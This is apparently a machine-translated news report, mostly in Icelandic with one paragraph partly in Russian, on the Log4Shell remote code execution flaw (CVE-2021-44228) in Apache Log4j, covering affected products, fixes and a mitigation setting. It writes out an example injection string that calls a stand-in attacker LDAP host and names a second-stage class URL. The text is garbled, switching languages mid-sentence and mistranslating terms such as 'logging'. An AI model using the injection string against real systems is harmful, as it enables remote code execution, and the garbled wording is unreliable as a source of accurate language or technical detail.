Í Apache Log4j, vinsælum ramma til að skipuleggja skógarhögg í Java forritum, hefur verið greint frá mikilvægum varnarleysi sem gerir kleift að keyra handahófskenndan kóða þegar sérsniðið gildi á „{jndi:URL}“ sniði er skrifað í annálinn. Árásin er hægt að framkvæma á Java forritum sem skrá gildi sem berast frá utanaðkomandi aðilum, til dæmis þegar vandamál eru sýnd í villuboðum.
Það er tekið fram að næstum öll verkefni sem nota ramma eins og Apache Struts, Apache Solr, Apache Druid eða Apache Flink verða fyrir áhrifum af vandamálinu, þar á meðal Steam, Apple iCloud, Minecraft viðskiptavinir og netþjónar. Búist er við að varnarleysið gæti leitt til bylgju gríðarlegra árása á fyrirtækjaforrit, endurtaka sögu mikilvægra veikleika í Apache Struts rammanum, sem, samkvæmt grófu mati, er notað í vefforritum af 65% Fortune 100 fyrirtæki. Þar á meðal tilraunir til að skanna netið fyrir viðkvæm kerfi.
Vandamálið eykst af því að vinnandi hagnýting hefur þegar verið birt, en lagfæringar fyrir stöðugu útibúin hafa ekki enn verið teknar saman. CVE auðkenni hefur ekki enn verið úthlutað. Lagfæringin er aðeins innifalin í log4j-2.15.0-rc1 prófunargreininni. Sem lausn til að loka á varnarleysið er mælt með því að stilla log4j2.formatMsgNoLookups færibreytuna á satt.
Проблема была вызвана тем, что log4j поддерживает обработку специальных масок «{}» в выводимых в лог строках, в которых могли выполняться запросы JNDI (Java Naming and Directory Interface). Атака сводится к передаче строки с подстановкой «${jndi:ldap://attacker.com/a}», при обработке которой log4j отправит на netþjóni attacker.com LDAP-запрос пути к Java-классу. Возвращённый miðlara Slóð árásarmannsins (t.d. http://second-stage.attacker.com/Exploit.class) verður hlaðin inn og keyrð í samhengi við núverandi ferli, sem gerir árásarmanninum kleift að keyra handahófskenndan kóða á kerfinu með réttindum núverandi forrits.
Viðbót 1: Varnarleysinu hefur verið úthlutað auðkenninu CVE-2021-44228.
Viðbót 2: Búið er að finna leið til að komast framhjá verndinni sem bætt var við útgáfu log4j-2.15.0-rc1. Ný uppfærsla, log4j-2.15.0-rc2, hefur verið lögð til með fullkomnari vörn gegn varnarleysinu. Kóðinn undirstrikar breytinguna sem tengist fjarveru óeðlilegrar uppsagnar ef notað er rangt sniðið JNDI vefslóð.
Heimild: opennet.ru
